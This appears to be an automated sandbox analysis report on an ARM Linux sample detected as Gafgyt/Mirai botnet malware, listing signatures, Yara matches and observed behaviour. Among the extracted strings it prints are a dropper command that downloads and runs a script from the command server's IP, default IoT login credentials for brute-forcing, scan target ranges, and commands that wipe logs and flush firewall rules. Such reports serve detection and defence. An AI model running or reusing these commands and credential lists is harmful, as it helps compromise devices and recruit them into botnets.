Linux Analysis Report
qkdjdjj888.arm7.elf

Overview

General Information

Sample name: qkdjdjj888.arm7.elf
Analysis ID: 1546869
MD5: d78a2539eb007bd56f0bc1a363ddced0
SHA1: 1275f7ce882376c70d82e69780b59505eeb47535
SHA256: 824bd7b116e2d5b8d2b7d11bd32756964313196f55fed442d0bc8ea3f54f704d
Tags: elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Opens /proc/net/* files useful for finding connected devices and routers
Sample deletes itself
Sample is potentially a Mirai botnet sample
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads CPU information from /sys indicative of miner or evasive malware
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of network range scanning capabilities
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are user agent strings indicative of HTTP manipulation
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Bashlite, Gafgyt Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: qkdjdjj888.arm7.elf Avira: detected
Found malware configuration
Source: qkdjdjj888.arm7.elf Malware Configuration Extractor: Gafgyt {"C2 url": "31.172.80.237:999"}
Multi AV Scanner detection for submitted file
Source: qkdjdjj888.arm7.elf ReversingLabs: Detection: 63%
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5602) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5605) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior

Spreading
barindex
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/qkdjdjj888.arm7.elf (PID: 5531) Opens: /proc/net/route Jump to behavior
Found strings indicative of a multi-platform dropper
Source: qkdjdjj888.arm7.elf String: curl http://31.172.80.237/qkdjdjj22.sh && wget http://31.172.80.237/qkdjdjj22.sh && chmod 777 * && sh qkdjdjj22.sh
Source: qkdjdjj888.arm7.elf String: curl http://31.172.80.237/qkdjdjj22.sh && wget http://31.172.80.237/qkdjdjj22.sh && chmod 777 * && sh qkdjdjj22.shcalvintelnetrootadminuser1234passwordsupportAdministratorservicesupervisorguestadmin1administrator666666888888ubntklv1234Zte521hi3518jvbzdankozlxx7ujMko0vizxv7ujMko0adminsystemikwbdreamboxrealtek0000000011111111234554321123456passmeinsmtechfuckerxc3511vizxvxmhdipcdefaultjuantechadmin12341111smcadminklv123ususarioamsjkfbnsmipsxdf.mipsxdf.*xdf*xdf.mipselxdf.x86_64xdf.arm7xdf.ppcxdf.sh4mipselsh4x86i686ppci586jack*hack*arm*tel*b1b2b3b4b5b6b7b8b9wgetorionlol*busybox*badbox*DFhxdhdfdvrHelperFDFDHFCFEUBFTUdftuiGHfjfgvjjhUOHJIPJIPJjJIPJuipjhkmyx86_64lolmipselRYrydryTwoFace*UYyuyioyx86_64XDzdfxzfxx*sh1234567891011121314151617181920busyboxbadboxMirai*mirai*cunty*IoT*mips64sh2ebsh2elfarmarmv5armv4tlarmv4armv6powerpcpowerpc440fpm68ksparcjackmymipsjackmymips64jackmymipseljackmysh2ebjackmysh2elfjackmysh4jackmyx86jackmyarmv5jackmyarmv4tljackmyarmv4jackmyarmv6jackmyi686jackmypowerpcjackmypowerpc440fpjackmyi586jackmym68kjackmysparcjackmyx86_64hackmymipshackmymips64hackmymipselhackmysh2ebhackmysh2elfhackmysh4hackmyx86hackmyarmv5hackmyarmv4tlhackmyarmv4hackmyarmv6hackmyi686hackmypowerpchackmypowerpc440fphackmyi586hackmym68khackmysparchackmyx86_64b1b10b11b12b13b14b15b16b17b18b19b20busyboxterroristkmymipskmymips64kmymipselkmysh2ebkmysh2elfkmysh4kmyx86kmyarmv5kmyarmv4tlkmyarmv4kmyarmv6kmyi686kmypowerpckmypowerpc440fpkmyi586kmym68kkmysparclolmipslolmips64lolsh2eblolsh2elflolsh4lolx86lolarmv5lolarmv4tllolarmv4lolarmv6loli686mirai.linuxmirai.mipslolpowerpclolpowerpc440fploli586lolm68klolsparctelmipstelmips64telmipseltelsh2ebtelsh2elftelsh4telx86telarmv5telarmv4tltelarmv4telarmv6teli686telpowerpctelpowerpc440fpteli586telm68ktelsparctelx86_64TwoFacemipsTwoFacemips64TwoFacemipselTwoFacesh2ebTwoFacesh2elfTwoFacesh4TwoFacex86TwoFacearmv5TwoFacearmv4tlTwoFacearmv4TwoFacearmv6TwoFacei686TwoFacepowerpcTwoFacepowerpc440fpTwoFacei586TwoFacem68kTwoFacesparcTwoFacex86_64xxb1xxb2xxb3xxb4xxb5xxb6xxb7xxb8xxb9xxb10xxb11xxb12xxb13xxb14xxb15xxb16xxb17xxb18xxb19xxb20bbbusybotnetpppdpppoewputB1B2B3B4B5B6B7B8B9B10B11B12B13B14B15B16B17B18B20DVR*mirai*.miraicunty*IoT*pcorion.mipsokiru.mipsnightcore.mipsarlsp.modzmipsxddie.mipsdupessh*mips*.mipsppssh4*wget*ssh*vulcanjennifer*okiru*vulcanavulcanbvulcandvulcanevulcanxvulcanyvulcanzvulcangapache2telnetd/tmp/*/root/tmp/*/temp/*/var/*/var/run/*/var/tmp/*usernamepassdvrdvsmdm9625F600F660F609BCMnvalidailedncorrecteniedrroroodbyebad$#shell(null)%s
Sample contains strings indicative of network range scanning capabilities
Source: Initial sample String containing an IP format string found: 37.11.%d.%d
Source: Initial sample String containing an IP format string found: 146.158.%d.%d
Source: Initial sample String containing an IP format string found: 185.4.%d.%d
Source: Initial sample String containing an IP format string found: 188.76.%d.%d
Source: Initial sample String containing an IP format string found: 188.77.%d.%d
Source: Initial sample String containing an IP format string found: 188.78.%d.%d
Source: Initial sample String containing an IP format string found: 188.79.%d.%d
Source: Initial sample String containing an IP format string found: 212.106.%d.%d
Source: Initial sample String containing an IP format string found: 212.9.%d.%d
Source: Initial sample String containing an IP format string found: 213.179.%d.%d
Source: Initial sample String containing an IP format string found: 37.132.%d.%d
Source: Initial sample String containing an IP format string found: 37.133.%d.%d
Source: Initial sample String containing an IP format string found: 37.134.%d.%d
Source: Initial sample String containing an IP format string found: 37.135.%d.%d
Source: Initial sample String containing an IP format string found: 37.14.%d.%d
Source: Initial sample String containing an IP format string found: 37.15.%d.%d
Source: Initial sample String containing an IP format string found: 37.35.%d.%d
Source: Initial sample String containing an IP format string found: 37.97.%d.%d
Source: Initial sample String containing an IP format string found: 62.14.%d.%d
Source: Initial sample String containing an IP format string found: 87.216.%d.%d
Source: Initial sample String containing an IP format string found: 87.217.%d.%d
Source: Initial sample String containing an IP format string found: 87.218.%d.%d
Source: Initial sample String containing an IP format string found: 87.219.%d.%d
Source: Initial sample String containing an IP format string found: 87.220.%d.%d
Source: Initial sample String containing an IP format string found: 87.221.%d.%d
Source: Initial sample String containing an IP format string found: 87.222.%d.%d
Source: Initial sample String containing an IP format string found: 87.223.%d.%d
Source: Initial sample String containing an IP format string found: 90.94.%d.%d
Source: Initial sample String containing an IP format string found: 92.191.%d.%d
Source: Initial sample String containing an IP format string found: 95.16.%d.%d
Source: Initial sample String containing an IP format string found: 95.17.%d.%d
Source: Initial sample String containing an IP format string found: 95.18.%d.%d
Source: Initial sample String containing an IP format string found: 95.19.%d.%d
Source: Initial sample String containing an IP format string found: 95.20.%d.%d
Source: Initial sample String containing an IP format string found: 95.21.%d.%d
Source: Initial sample String containing an IP format string found: 95.22.%d.%d
Source: Initial sample String containing an IP format string found: 95.23.%d.%d
Source: Initial sample String containing an IP format string found: 119.157.%d.%d
Source: Initial sample String containing an IP format string found: 119.150.%d.%d
Source: Initial sample String containing an IP format string found: 119.151.%d.%d
Source: Initial sample String containing an IP format string found: 119.152.%d.%d
Source: Initial sample String containing an IP format string found: 119.153.%d.%d
Source: Initial sample String containing an IP format string found: 119.154.%d.%d
Source: Initial sample String containing an IP format string found: 119.155.%d.%d
Source: Initial sample String containing an IP format string found: 119.156.%d.%d
Source: Initial sample String containing an IP format string found: 119.158.%d.%d
Source: Initial sample String containing an IP format string found: 119.159.%d.%d
Source: Initial sample String containing an IP format string found: 191.24.%d.%d
Source: Initial sample String containing an IP format string found: 187.119.%d.%d
Source: Initial sample String containing an IP format string found: 177.215.%d.%d
Source: Initial sample String containing an IP format string found: 152.241.%d.%d
Source: Initial sample String containing an IP format string found: 182.185.%d.%d
Source: Initial sample String containing an IP format string found: 179.80.%d.%d
Source: Initial sample String containing an IP format string found: 179.81.%d.%d
Source: Initial sample String containing an IP format string found: 179.82.%d.%d
Source: Initial sample String containing an IP format string found: 179.83.%d.%d
Source: Initial sample String containing an IP format string found: 179.84.%d.%d
Source: Initial sample String containing an IP format string found: 179.86.%d.%d
Source: Initial sample String containing an IP format string found: 179.87.%d.%d
Source: Initial sample String containing an IP format string found: 179.88.%d.%d
Source: Initial sample String containing an IP format string found: 179.89.%d.%d
Source: Initial sample String containing an IP format string found: 179.90.%d.%d
Source: Initial sample String containing an IP format string found: 179.91.%d.%d
Source: Initial sample String containing an IP format string found: 179.92.%d.%d
Source: Initial sample String containing an IP format string found: 179.93.%d.%d
Source: Initial sample String containing an IP format string found: 179.94.%d.%d
Source: Initial sample String containing an IP format string found: 179.95.%d.%d
Source: Initial sample String containing an IP format string found: 179.96.%d.%d
Source: Initial sample String containing an IP format string found: 179.97.%d.%d
Source: Initial sample String containing an IP format string found: 179.98.%d.%d
Source: Initial sample String containing an IP format string found: 179.99.%d.%d
Source: Initial sample String containing an IP format string found: 152.240.%d.%d
Source: Initial sample String containing an IP format string found: 152.242.%d.%d
Source: Initial sample String containing an IP format string found: 152.243.%d.%d
Source: Initial sample String containing an IP format string found: 152.244.%d.%d
Source: Initial sample String containing an IP format string found: 152.245.%d.%d
Source: Initial sample String containing an IP format string found: 152.246.%d.%d
Source: Initial sample String containing an IP format string found: 152.247.%d.%d
Source: Initial sample String containing an IP format string found: 152.248.%d.%d
Source: Initial sample String containing an IP format string found: 152.249.%d.%d
Source: Initial sample String containing an IP format string found: 182.189.%d.%d
Source: Initial sample String containing an IP format string found: 182.190.%d.%d
Source: Initial sample String containing an IP format string found: 182.191.%d.%d
Source: Initial sample String containing an IP format string found: 182.188.%d.%d
Source: Initial sample String containing an IP format string found: 182.187.%d.%d
Source: Initial sample String containing an IP format string found: 182.186.%d.%d
Source: Initial sample String containing an IP format string found: 182.184.%d.%d
Source: Initial sample String containing an IP format string found: 179.100.%d.%d
Source: Initial sample String containing an IP format string found: 179.101.%d.%d
Source: Initial sample String containing an IP format string found: 179.102.%d.%d
Source: Initial sample String containing an IP format string found: 179.103.%d.%d
Source: Initial sample String containing an IP format string found: 179.110.%d.%d
Source: Initial sample String containing an IP format string found: 179.111.%d.%d
Source: Initial sample String containing an IP format string found: 179.112.%d.%d
Source: Initial sample String containing an IP format string found: 179.113.%d.%d
Source: Initial sample String containing an IP format string found: 179.114.%d.%d
Source: Initial sample String containing an IP format string found: 179.115.%d.%d
Source: Initial sample String containing an IP format string found: 179.116.%d.%d
Source: Initial sample String containing an IP format string found: 179.117.%d.%d
Source: Initial sample String containing an IP format string found: 191.193.%d.%d

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2836914 - Severity 1 - ETPRO MALWARE ELF/Various IoT Botnet CnC Checkin : 192.168.2.15:35282 -> 31.172.80.237:999
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 5610) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5610) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.15:35282 -> 31.172.80.237:999
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5624) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5629) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Sample contains strings indicative of network range scanning capabilities
Source: Initial sample String containing an IP format string found: 37.11.%d.%d
Source: Initial sample String containing an IP format string found: 146.158.%d.%d
Source: Initial sample String containing an IP format string found: 185.4.%d.%d
Source: Initial sample String containing an IP format string found: 188.76.%d.%d
Source: Initial sample String containing an IP format string found: 188.77.%d.%d
Source: Initial sample String containing an IP format string found: 188.78.%d.%d
Source: Initial sample String containing an IP format string found: 188.79.%d.%d
Source: Initial sample String containing an IP format string found: 212.106.%d.%d
Source: Initial sample String containing an IP format string found: 212.9.%d.%d
Source: Initial sample String containing an IP format string found: 213.179.%d.%d
Source: Initial sample String containing an IP format string found: 37.132.%d.%d
Source: Initial sample String containing an IP format string found: 37.133.%d.%d
Source: Initial sample String containing an IP format string found: 37.134.%d.%d
Source: Initial sample String containing an IP format string found: 37.135.%d.%d
Source: Initial sample String containing an IP format string found: 37.14.%d.%d
Source: Initial sample String containing an IP format string found: 37.15.%d.%d
Source: Initial sample String containing an IP format string found: 37.35.%d.%d
Source: Initial sample String containing an IP format string found: 37.97.%d.%d
Source: Initial sample String containing an IP format string found: 62.14.%d.%d
Source: Initial sample String containing an IP format string found: 87.216.%d.%d
Source: Initial sample String containing an IP format string found: 87.217.%d.%d
Source: Initial sample String containing an IP format string found: 87.218.%d.%d
Source: Initial sample String containing an IP format string found: 87.219.%d.%d
Source: Initial sample String containing an IP format string found: 87.220.%d.%d
Source: Initial sample String containing an IP format string found: 87.221.%d.%d
Source: Initial sample String containing an IP format string found: 87.222.%d.%d
Source: Initial sample String containing an IP format string found: 87.223.%d.%d
Source: Initial sample String containing an IP format string found: 90.94.%d.%d
Source: Initial sample String containing an IP format string found: 92.191.%d.%d
Source: Initial sample String containing an IP format string found: 95.16.%d.%d
Source: Initial sample String containing an IP format string found: 95.17.%d.%d
Source: Initial sample String containing an IP format string found: 95.18.%d.%d
Source: Initial sample String containing an IP format string found: 95.19.%d.%d
Source: Initial sample String containing an IP format string found: 95.20.%d.%d
Source: Initial sample String containing an IP format string found: 95.21.%d.%d
Source: Initial sample String containing an IP format string found: 95.22.%d.%d
Source: Initial sample String containing an IP format string found: 95.23.%d.%d
Source: Initial sample String containing an IP format string found: 119.157.%d.%d
Source: Initial sample String containing an IP format string found: 119.150.%d.%d
Source: Initial sample String containing an IP format string found: 119.151.%d.%d
Source: Initial sample String containing an IP format string found: 119.152.%d.%d
Source: Initial sample String containing an IP format string found: 119.153.%d.%d
Source: Initial sample String containing an IP format string found: 119.154.%d.%d
Source: Initial sample String containing an IP format string found: 119.155.%d.%d
Source: Initial sample String containing an IP format string found: 119.156.%d.%d
Source: Initial sample String containing an IP format string found: 119.158.%d.%d
Source: Initial sample String containing an IP format string found: 119.159.%d.%d
Source: Initial sample String containing an IP format string found: 191.24.%d.%d
Source: Initial sample String containing an IP format string found: 187.119.%d.%d
Source: Initial sample String containing an IP format string found: 177.215.%d.%d
Source: Initial sample String containing an IP format string found: 152.241.%d.%d
Source: Initial sample String containing an IP format string found: 182.185.%d.%d
Source: Initial sample String containing an IP format string found: 179.80.%d.%d
Source: Initial sample String containing an IP format string found: 179.81.%d.%d
Source: Initial sample String containing an IP format string found: 179.82.%d.%d
Source: Initial sample String containing an IP format string found: 179.83.%d.%d
Source: Initial sample String containing an IP format string found: 179.84.%d.%d
Source: Initial sample String containing an IP format string found: 179.86.%d.%d
Source: Initial sample String containing an IP format string found: 179.87.%d.%d
Source: Initial sample String containing an IP format string found: 179.88.%d.%d
Source: Initial sample String containing an IP format string found: 179.89.%d.%d
Source: Initial sample String containing an IP format string found: 179.90.%d.%d
Source: Initial sample String containing an IP format string found: 179.91.%d.%d
Source: Initial sample String containing an IP format string found: 179.92.%d.%d
Source: Initial sample String containing an IP format string found: 179.93.%d.%d
Source: Initial sample String containing an IP format string found: 179.94.%d.%d
Source: Initial sample String containing an IP format string found: 179.95.%d.%d
Source: Initial sample String containing an IP format string found: 179.96.%d.%d
Source: Initial sample String containing an IP format string found: 179.97.%d.%d
Source: Initial sample String containing an IP format string found: 179.98.%d.%d
Source: Initial sample String containing an IP format string found: 179.99.%d.%d
Source: Initial sample String containing an IP format string found: 152.240.%d.%d
Source: Initial sample String containing an IP format string found: 152.242.%d.%d
Source: Initial sample String containing an IP format string found: 152.243.%d.%d
Source: Initial sample String containing an IP format string found: 152.244.%d.%d
Source: Initial sample String containing an IP format string found: 152.245.%d.%d
Source: Initial sample String containing an IP format string found: 152.246.%d.%d
Source: Initial sample String containing an IP format string found: 152.247.%d.%d
Source: Initial sample String containing an IP format string found: 152.248.%d.%d
Source: Initial sample String containing an IP format string found: 152.249.%d.%d
Source: Initial sample String containing an IP format string found: 182.189.%d.%d
Source: Initial sample String containing an IP format string found: 182.190.%d.%d
Source: Initial sample String containing an IP format string found: 182.191.%d.%d
Source: Initial sample String containing an IP format string found: 182.188.%d.%d
Source: Initial sample String containing an IP format string found: 182.187.%d.%d
Source: Initial sample String containing an IP format string found: 182.186.%d.%d
Source: Initial sample String containing an IP format string found: 182.184.%d.%d
Source: Initial sample String containing an IP format string found: 179.100.%d.%d
Source: Initial sample String containing an IP format string found: 179.101.%d.%d
Source: Initial sample String containing an IP format string found: 179.102.%d.%d
Source: Initial sample String containing an IP format string found: 179.103.%d.%d
Source: Initial sample String containing an IP format string found: 179.110.%d.%d
Source: Initial sample String containing an IP format string found: 179.111.%d.%d
Source: Initial sample String containing an IP format string found: 179.112.%d.%d
Source: Initial sample String containing an IP format string found: 179.113.%d.%d
Source: Initial sample String containing an IP format string found: 179.114.%d.%d
Source: Initial sample String containing an IP format string found: 179.115.%d.%d
Source: Initial sample String containing an IP format string found: 179.116.%d.%d
Source: Initial sample String containing an IP format string found: 179.117.%d.%d
Source: Initial sample String containing an IP format string found: 191.193.%d.%d
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: unknown TCP traffic detected without corresponding DNS query: 31.172.80.237
Source: qkdjdjj888.arm7.elf String found in binary or memory: http://31.172.80.237/qkdjdjj22.sh
Source: qkdjdjj888.arm7.elf String found in binary or memory: http://www.baidu.com/search/spider.html)

DDoS
barindex
Sample is potentially a Mirai botnet sample
Source: Initial sample String containing containing keyword 'mirai' found: Mirai*
Source: Initial sample String containing containing keyword 'mirai' found: mirai*
Source: Initial sample String containing containing keyword 'mirai' found: mirai.linux
Source: Initial sample String containing containing keyword 'mirai' found: mirai.mips
Source: Initial sample String containing containing keyword 'mirai' found: *mirai
Source: Initial sample String containing containing keyword 'mirai' found: *.mirai
Source: Initial sample String containing containing keyword 'mirai' found: miraiMIRAI
Source: Initial sample String containing containing keyword 'mirai' found: MIRAI
Source: Initial sample String containing containing keyword 'mirai' found: Mirai Range %d->%d
Source: Initial sample String containing containing keyword 'mirai' found: Mirai Test RANGE <option 0-idk>
Source: Initial sample String containing containing keyword 'mirai' found: MIRAITEST
Source: Initial sample String containing containing keyword 'mirai' found: MiraiIPRanges
Source: Initial sample String containing containing keyword 'mirai' found: MiraiHackaShit
Source: Initial sample String containing containing keyword 'mirai' found: mirairange
Source: Initial sample String containing containing keyword 'mirai' found: testmiraiPid
Source: Initial sample String containing containing keyword 'mirai' found: Mirai_Usernames
Source: Initial sample String containing containing keyword 'mirai' found: miraifindARandomIP
Source: Initial sample String containing containing keyword 'mirai' found: miraiPid
Source: Initial sample String containing containing keyword 'mirai' found: Mirai_Passwords
Source: Initial sample String containing containing keyword 'mirai' found: MiraiScanner
Source: Initial sample String containing containing keyword 'mirai' found: miraitestrange
Source: Initial sample String containing containing keyword 'mirai' found: miraitestfindARandomIP

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: qkdjdjj888.arm7.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_6a510422 Author: unknown
Source: qkdjdjj888.arm7.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d2953f92 Author: unknown
Source: qkdjdjj888.arm7.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 Author: unknown
Source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 Author: unknown
Source: 5531.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 Author: unknown
Source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 Author: unknown
Source: 5533.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 Author: unknown
Source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 Author: unknown
Source: 5535.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_6a510422 Author: unknown
Source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d2953f92 Author: unknown
Source: 5537.1.00007f1b54017000.00007f1b54043000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5531, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5533, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5535, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Source: Process Memory Space: qkdjdjj888.arm7.elf PID: 5537, type: MEMORYSTR Matched rule: Linux_Trojan_Mirai_b9a9d04b Author: unknown
Sample and/or dropped files contains symbols with suspicious names
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: BCMscanner
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Busybox_Payload
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: MiraiScanner
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Mirai_Passwords
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Mirai_Usernames
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Payload
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: PhoneScan
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: PhoneScanner
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Phonepid
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: SSH_Passwords
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: SSH_Usernames
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: TelnetScanner
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Telnet_Passwords
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: Telnet_Usernames
Source: qkdjdjj888.arm7.elf ELF static info symbol of initial sample: __gnu_unwind_execute
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox*
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: busyboxterrorist
Source: Initial sample String containing 'busybox' found: curl http://31.172.80.237/qkdjdjj22.sh && wget http://31.172.80.237/qkdjdjj22.sh && chmod 777 * && sh qkdjdjj22.shcalvintelnetrootadminuser1234passwordsupportAdministratorservicesupervisorguestadmin1administrator666666888888ubntklv1234Zte521hi3518jvbzdankozlxx7ujMko0vizxv7ujMko0adminsystemikwbdreamboxrealtek0000000011111111234554321123456passmeinsmtechfuckerxc3511vizxvxmhdipcdefaultjuantechadmin12341111smcadminklv123ususarioamsjkfbnsmipsxdf.mipsxdf.*xdf*xdf.mipselxdf.x86_64xdf.arm7xdf.ppcxdf.sh4mipselsh4x86i686ppci586jack*hack*arm*tel*b1b2b3b4b5b6b7b8b9wgetorionlol*busybox*badbox*DFhxdhdfdvrHelperFDFDHFCFEUBFTUdftuiGHfjfgvjjhUOHJIPJIPJjJIPJuipjhkmyx86_64lolmipselRYrydryTwoFace*UYyuyioyx86_64XDzdfxzfxx*sh1234567891011121314151617181920busyboxbadboxMirai*mirai*cunty*IoT*mips64sh2ebsh2elfarmarmv5armv4tlarmv4armv6powerpcpowerpc440fpm68ksparcjackmymipsjackmymips64jackmymipseljackmysh2ebjackmysh2elfjackmysh4jackmyx86jackmyarmv5jackmyarmv4tljackmyarmv4jackmyarmv6jackmyi686jackmypowerpcjackmypowerpc440fpjackmyi586jac
Source: Initial sample String containing 'busybox' found: pkill -9 busybox
Source: Initial sample String containing 'busybox' found: rm -rf /tmp/* /var/* /var/run/* /var/tmp/*rm -rf /var/log/wtmprm -rf ~/.bash_historyrm -rf /tmp/*history -crm -rf /bin/netstathistory -wpkill -9 busyboxpkill -9 perlservice iptables stop/sbin/iptables -F;/sbin/iptables -Xservice firewalld stopBIG_ENDIANLITTLE_ENDIANBIG_ENDIAN_WLITTLE_ENDIAN_WUNKNOWN/usr/bin/pythonSERVERDEVICE8.8.8.8/proc/net/route00000000/
Source: Initial sample String containing 'busybox' found: Busybox_Payload
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: admin1234
Yara signature match
Source: qkdjdjj888.arm7.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_6a510422 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75, id = 6a510422-3662-4fdb-9c03-0101f16e87cd, last_modified = 2021-09-16
Source: qkdjdjj888.arm7.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_d2953f92 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc, id = d2953f92-62ee-428d-88c5-723914c88c6e, last_modified = 2021-09-16
Source: qkdjdjj888.arm7.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b9a9d04b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1, id = b9a9d04b-a997-46c4-b893-e89a3813efd3, last_modified = 2021-09-16
